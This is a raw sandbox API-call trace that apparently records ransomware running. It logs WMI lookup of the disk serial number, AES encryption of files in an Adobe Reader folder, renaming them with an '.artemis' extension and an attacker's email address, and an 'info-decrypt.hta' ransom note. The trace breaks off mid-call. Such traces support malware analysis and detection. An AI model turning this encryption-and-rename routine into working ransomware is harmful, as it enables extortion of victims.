[0197.901] CoGetContextToken (in: pToken=0x6cee8f8 | out: pToken=0x6cee8f8) returned 0x0 [0197.901] WbemLocator:IUnknown:QueryInterface (in: This=0x6737068, riid=0x6cee9c8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6cee9c4 | out: ppvObject=0x6cee9c4*=0x6737068) returned 0x0 [0197.901] WbemLocator:IUnknown:AddRef (This=0x6737068) returned 0x3 [0197.901] WbemLocator:IUnknown:Release (This=0x6737068) returned 0x2 [0197.901] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738770, puCount=0x6ceeb5c | out: puCount=0x6ceeb5c*=0x2) returned 0x0 [0197.901] WbemDefPath:IWbemPath:GetText (in: This=0x6738770, lFlags=8, puBuffLength=0x6ceeb58*=0x0, pszText=0x0 | out: puBuffLength=0x6ceeb58*=0xf, pszText=0x0) returned 0x0 [0197.901] WbemDefPath:IWbemPath:GetText (in: This=0x6738770, lFlags=8, puBuffLength=0x6ceeb58*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ceeb58*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0197.901] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6ceea34 | out: ppv=0x6ceea34*=0x6737058) returned 0x0 [0197.902] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6737058, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6ceeac8 | out: ppNamespace=0x6ceeac8*=0x6748314) returned 0x0 [0198.604] WbemLocator:IUnknown:QueryInterface (in: This=0x6748314, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee964 | out: ppvObject=0x6cee964*=0x781ae4) returned 0x0 [0198.604] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x781ae4, pProxy=0x6748314, pAuthnSvc=0x6cee9b4, pAuthzSvc=0x6cee9b0, pServerPrincName=0x6cee9a8, pAuthnLevel=0x6cee9ac, pImpLevel=0x6cee99c, pAuthInfo=0x6cee9a0, pCapabilites=0x6cee9a4 | out: pAuthnSvc=0x6cee9b4*=0xa, pAuthzSvc=0x6cee9b0*=0x0, pServerPrincName=0x6cee9a8, pAuthnLevel=0x6cee9ac*=0x6, pImpLevel=0x6cee99c*=0x2, pAuthInfo=0x6cee9a0, pCapabilites=0x6cee9a4*=0x1) returned 0x0 [0198.604] WbemLocator:IUnknown:Release (This=0x781ae4) returned 0x1 [0198.604] WbemLocator:IUnknown:QueryInterface (in: This=0x6748314, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee958 | out: ppvObject=0x6cee958*=0x781b04) returned 0x0 [0198.604] WbemLocator:IUnknown:QueryInterface (in: This=0x6748314, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee954 | out: ppvObject=0x6cee954*=0x781ae4) returned 0x0 [0198.605] WbemLocator:IClientSecurity:SetBlanket (This=0x781ae4, pProxy=0x6748314, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0198.605] WbemLocator:IUnknown:Release (This=0x781ae4) returned 0x2 [0198.605] WbemLocator:IUnknown:Release (This=0x781b04) returned 0x1 [0198.605] CoTaskMemFree (pv=0x77e0b8) [0198.605] WbemLocator:IUnknown:Release (This=0x6737058) returned 0x0 [0198.605] WbemLocator:IUnknown:QueryInterface (in: This=0x6748314, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee554 | out: ppvObject=0x6cee554*=0x781b04) returned 0x0 [0198.605] WbemLocator:IUnknown:QueryInterface (in: This=0x781b04, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6cee510 | out: ppvObject=0x6cee510*=0x0) returned 0x80004002 [0198.607] WbemLocator:IUnknown:QueryInterface (in: This=0x781b04, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6cee32c | out: ppvObject=0x6cee32c*=0x0) returned 0x80004002 [0198.607] WbemLocator:IUnknown:AddRef (This=0x781b04) returned 0x3 [0198.607] WbemLocator:IUnknown:QueryInterface (in: This=0x781b04, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6cede6c | out: ppvObject=0x6cede6c*=0x0) returned 0x80004002 [0198.608] WbemLocator:IUnknown:QueryInterface (in: This=0x781b04, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6cede1c | out: ppvObject=0x6cede1c*=0x0) returned 0x80004002 [0198.608] WbemLocator:IUnknown:QueryInterface (in: This=0x781b04, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cede28 | out: ppvObject=0x6cede28*=0x781a64) returned 0x0 [0198.609] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x781a64, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6cede30 | out: pCid=0x6cede30*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0198.609] WbemLocator:IUnknown:Release (This=0x781a64) returned 0x3 [0198.609] CoGetContextToken (in: pToken=0x6cede88 | out: pToken=0x6cede88) returned 0x0 [0198.609] CoGetContextToken (in: pToken=0x6cee290 | out: pToken=0x6cee290) returned 0x0 [0198.609] WbemLocator:IUnknown:QueryInterface (in: This=0x781b04, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee320 | out: ppvObject=0x6cee320*=0x781aec) returned 0x0 [0198.609] WbemLocator:IRpcOptions:Query (in: This=0x781aec, pPrx=0x781b04, dwProperty=2, pdwValue=0x6cee348 | out: pdwValue=0x6cee348) returned 0x80004002 [0198.609] WbemLocator:IUnknown:Release (This=0x781aec) returned 0x3 [0198.609] WbemLocator:IUnknown:Release (This=0x781b04) returned 0x2 [0198.609] CoGetContextToken (in: pToken=0x6cee868 | out: pToken=0x6cee868) returned 0x0 [0198.609] CoGetContextToken (in: pToken=0x6cee7c8 | out: pToken=0x6cee7c8) returned 0x0 [0198.609] WbemLocator:IUnknown:QueryInterface (in: This=0x781b04, riid=0x6cee898*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6cee894 | out: ppvObject=0x6cee894*=0x6748314) returned 0x0 [0198.609] WbemLocator:IUnknown:AddRef (This=0x6748314) returned 0x4 [0198.609] WbemLocator:IUnknown:Release (This=0x6748314) returned 0x3 [0198.609] WbemLocator:IUnknown:Release (This=0x6748314) returned 0x2 [0198.609] SysStringLen (param_1=0x0) returned 0x0 [0198.609] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738c40, puCount=0x6ceec2c | out: puCount=0x6ceec2c*=0x0) returned 0x0 [0198.609] WbemDefPath:IWbemPath:GetText (in: This=0x6738c40, lFlags=2, puBuffLength=0x6ceec28*=0x0, pszText=0x0 | out: puBuffLength=0x6ceec28*=0x20, pszText=0x0) returned 0x0 [0198.609] WbemDefPath:IWbemPath:GetText (in: This=0x6738c40, lFlags=2, puBuffLength=0x6ceec28*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6ceec28*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0198.609] CoGetContextToken (in: pToken=0x6cee898 | out: pToken=0x6cee898) returned 0x0 [0198.609] WbemLocator:IUnknown:AddRef (This=0x781b04) returned 0x3 [0198.609] WbemLocator:IUnknown:QueryInterface (in: This=0x781b04, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee72c | out: ppvObject=0x6cee72c*=0x781b04) returned 0x0 [0198.610] WbemLocator:IUnknown:Release (This=0x781b04) returned 0x3 [0198.610] WbemLocator:IUnknown:Release (This=0x781b04) returned 0x2 [0198.610] WbemDefPath:IWbemPath:GetText (in: This=0x6738c40, lFlags=2, puBuffLength=0x6ceec30*=0x0, pszText=0x0 | out: puBuffLength=0x6ceec30*=0x20, pszText=0x0) returned 0x0 [0198.610] WbemDefPath:IWbemPath:GetText (in: This=0x6738c40, lFlags=2, puBuffLength=0x6ceec30*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6ceec30*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0198.610] IWbemServices:GetObject (in: This=0x6748314, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6ceebe4*=0x0, ppCallResult=0x0 | out: ppObject=0x6ceebe4*=0x673bf90, ppCallResult=0x0) returned 0x0 [0199.320] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738770, puCount=0x6ceebe4 | out: puCount=0x6ceebe4*=0x2) returned 0x0 [0199.320] WbemDefPath:IWbemPath:GetText (in: This=0x6738770, lFlags=4, puBuffLength=0x6ceebe0*=0x0, pszText=0x0 | out: puBuffLength=0x6ceebe0*=0xf, pszText=0x0) returned 0x0 [0199.320] WbemDefPath:IWbemPath:GetText (in: This=0x6738770, lFlags=4, puBuffLength=0x6ceebe0*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ceebe0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0199.320] IWbemClassObject:Get (in: This=0x673bf90, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6ceebe0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350f264*=0, plFlavor=0x350f268*=0 | out: pVal=0x6ceebe0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x350f264*=8, plFlavor=0x350f268*=0) returned 0x0 [0199.320] SysStringByteLen (bstr="9C354B42") returned 0x10 [0199.320] SysStringByteLen (bstr="9C354B42") returned 0x10 [0199.320] IWbemClassObject:Get (in: This=0x673bf90, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6ceebe8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x350f264*=8, plFlavor=0x350f268*=0 | out: pVal=0x6ceebe8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x350f264*=8, plFlavor=0x350f268*=0) returned 0x0 [0199.320] SysStringByteLen (bstr="9C354B42") returned 0x10 [0199.321] SysStringByteLen (bstr="9C354B42") returned 0x10 [0199.321] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm", nBufferLength=0x105, lpBuffer=0x6cee7e8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm", lpFilePart=0x0) returned 0x34 [0199.321] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x6cee7e8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x5f [0199.321] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceec48) returned 1 [0199.321] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\irakhau.htm"), fInfoLevelId=0x0, lpFileInformation=0x6ceecc4 | out: lpFileInformation=0x6ceecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d67db00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81ed8ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x1d832be0, ftLastWriteTime.dwHighDateTime=0x1d6a20b, nFileSizeHigh=0x0, nFileSizeLow=0x44a0)) returned 1 [0199.321] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceec44) returned 1 [0199.321] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\irakhau.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\irakhau.htm.id-9c354b42.[khalate@tutanota.com].artemis")) returned 1 [0199.322] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm", nBufferLength=0x105, lpBuffer=0x6cee88c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm", lpFilePart=0x0) returned 0x32 [0199.322] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm", nBufferLength=0x105, lpBuffer=0x6cee884, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm", lpFilePart=0x0) returned 0x32 [0199.322] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6cee88c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", lpFilePart=0x0) returned 0x39 [0199.322] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceecec) returned 1 [0199.322] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6ceed68 | out: lpFileInformation=0x6ceed68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x109b3760, ftCreationTime.dwHighDateTime=0x1d6a20b, ftLastAccessTime.dwLowDateTime=0x109b3760, ftLastAccessTime.dwHighDateTime=0x1d6a20b, ftLastWriteTime.dwLowDateTime=0x109b3760, ftLastWriteTime.dwHighDateTime=0x1d6a20b, nFileSizeHigh=0x0, nFileSizeLow=0x1557)) returned 1 [0199.322] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceece8) returned 1 [0199.322] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm", nBufferLength=0x105, lpBuffer=0x6cee808, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm", lpFilePart=0x0) returned 0x32 [0199.322] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceecb4) returned 1 [0199.322] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leame.htm"), fInfoLevelId=0x0, lpFileInformation=0x350f894 | out: lpFileInformation=0x350f894*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7feb61e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x423b)) returned 1 [0199.323] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceecb0) returned 1 [0199.324] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm", nBufferLength=0x105, lpBuffer=0x6cee6f4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm", lpFilePart=0x0) returned 0x32 [0199.324] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceebe8) returned 1 [0199.324] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leame.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3dc [0199.324] GetFileType (hFile=0x3dc) returned 0x1 [0199.324] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceebe4) returned 1 [0199.324] GetFileType (hFile=0x3dc) returned 0x1 [0199.324] GetFileSize (in: hFile=0x3dc, lpFileSizeHigh=0x6ceecf0 | out: lpFileSizeHigh=0x6ceecf0*=0x0) returned 0x423b [0199.324] ReadFile (in: hFile=0x3dc, lpBuffer=0x35af0d8, nNumberOfBytesToRead=0x423b, lpNumberOfBytesRead=0x6ceec9c, lpOverlapped=0x0 | out: lpBuffer=0x35af0d8*, lpNumberOfBytesRead=0x6ceec9c*=0x423b, lpOverlapped=0x0) returned 1 [0199.326] CloseHandle (hObject=0x3dc) returned 1 [0199.326] CryptAcquireContextW (in: phProv=0x6ceec3c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ceec3c*=0x7a94a8) returned 1 [0199.327] CryptGenRandom (in: hProv=0x7a94a8, dwLen=0x10, pbBuffer=0x35b3668 | out: pbBuffer=0x35b3668) returned 1 [0199.859] CryptImportKey (in: hProv=0x7a94a8, pbData=0x352c1a0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6ceec0c | out: phKey=0x6ceec0c*=0x77b5b0) returned 1 [0199.859] CryptContextAddRef (hProv=0x7a94a8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0199.859] CryptContextAddRef (hProv=0x7a94a8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0199.860] CryptDuplicateKey (in: hKey=0x77b5b0, pdwReserved=0x0, dwFlags=0x0, phKey=0x6ceebfc | out: phKey=0x6ceebfc*=0x77b070) returned 1 [0199.860] CryptContextAddRef (hProv=0x7a94a8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0199.860] CryptSetKeyParam (hKey=0x77b070, dwParam=0x4, pbData=0x352c280*=0x1, dwFlags=0x0) returned 1 [0199.860] CryptSetKeyParam (hKey=0x77b070, dwParam=0x1, pbData=0x352c24c, dwFlags=0x0) returned 1 [0199.860] CryptEncrypt (in: hKey=0x77b070, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x352c290*, pdwDataLen=0x6ceec68*=0x4240, dwBufLen=0x4240 | out: pbData=0x352c290*, pdwDataLen=0x6ceec68*=0x4240) returned 1 [0199.860] CryptEncrypt (in: hKey=0x77b070, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x35304f4*, pdwDataLen=0x6ceec70*=0x0, dwBufLen=0x10 | out: pbData=0x35304f4*, pdwDataLen=0x6ceec70*=0x10) returned 1 [0199.862] CryptDestroyKey (hKey=0x77b5b0) returned 1 [0199.862] CryptReleaseContext (hProv=0x7a94a8, dwFlags=0x0) returned 1 [0199.862] CryptReleaseContext (hProv=0x7a94a8, dwFlags=0x0) returned 1 [0199.862] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm", nBufferLength=0x105, lpBuffer=0x6cee6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm", lpFilePart=0x0) returned 0x32 [0199.862] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceebd4) returned 1 [0199.862] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leame.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3dc [0199.863] GetFileType (hFile=0x3dc) returned 0x1 [0199.863] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6ceebd0) returned 1 [0200.051] GetFileType (hFile=0x3dc) returned 0x1 [0200.051] WriteFile (in: hFile=0x3dc, lpBuffer=0x3543ca8*, nNumberOfBytesToWrite=0x4450, lpNumberOfBytesWritten=0x6ceec90, lpOverlapped=0x0 | out: lpBuffer=0x3543ca8*, lpNumberOfBytesWritten=0x6ceec90*=0x4450, lpOverlapped=0x0) returned 1 [0200.052] CloseHandle (hObject=0x3dc) returned 1 [0200.054] CoTaskMemAlloc (cb=0x20c) returned 0x98315b8 [0200.054] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x98315b8 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0200.054] CoTaskMemFree (pv=0x98315b8) [0200.054] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6cee6c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0200.054] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ceec10 | out: ppv=0x6ceec10*=0x72015c) returned 0x0 [0200.054] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6ceec08 | out: pAptType=0x6ceec08*=1) returned 0x0 [0200.054] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6ceec0c | out: ppvObject=0x6ceec0c*=0x0) returned 0x80004002 [0200.054] IUnknown:Release (This=0x72015c) returned 0x1 [0200.055] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6cee578 | out: ppv=0x6cee578*=0x6736e18) returned 0x0 [0200.056] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736e18, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6cee790 | out: ppvObject=0x6cee790*=0x0) returned 0x80004002 [0200.056] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736e18, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee7a4 | out: ppvObject=0x6cee7a4*=0x67388c0) returned 0x0 [0200.056] WbemDefPath:IUnknown:Release (This=0x6736e18) returned 0x0 [0200.056] WbemDefPath:IUnknown:QueryInterface (in: This=0x67388c0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee3c4 | out: ppvObject=0x6cee3c4*=0x67388c0) returned 0x0 [0200.056] WbemDefPath:IUnknown:QueryInterface (in: This=0x67388c0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6cee380 | out: ppvObject=0x6cee380*=0x0) returned 0x80004002 [0200.056] WbemDefPath:IUnknown:AddRef (This=0x67388c0) returned 0x3 [0200.056] WbemDefPath:IUnknown:QueryInterface (in: This=0x67388c0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6cedcdc | out: ppvObject=0x6cedcdc*=0x0) returned 0x80004002 [0200.056] WbemDefPath:IUnknown:QueryInterface (in: This=0x67388c0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6cedc8c | out: ppvObject=0x6cedc8c*=0x0) returned 0x80004002 [0200.056] WbemDefPath:IUnknown:QueryInterface (in: This=0x67388c0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cedc98 | out: ppvObject=0x6cedc98*=0x77bfc8) returned 0x0 [0200.056] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77bfc8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6cedca0 | out: pCid=0x6cedca0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0200.056] WbemDefPath:IUnknown:Release (This=0x77bfc8) returned 0x3 [0200.056] CoGetContextToken (in: pToken=0x6cedcf8 | out: pToken=0x6cedcf8) returned 0x0 [0200.056] CoGetContextToken (in: pToken=0x6cee100 | out: pToken=0x6cee100) returned 0x0 [0200.057] WbemDefPath:IUnknown:QueryInterface (in: This=0x67388c0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, 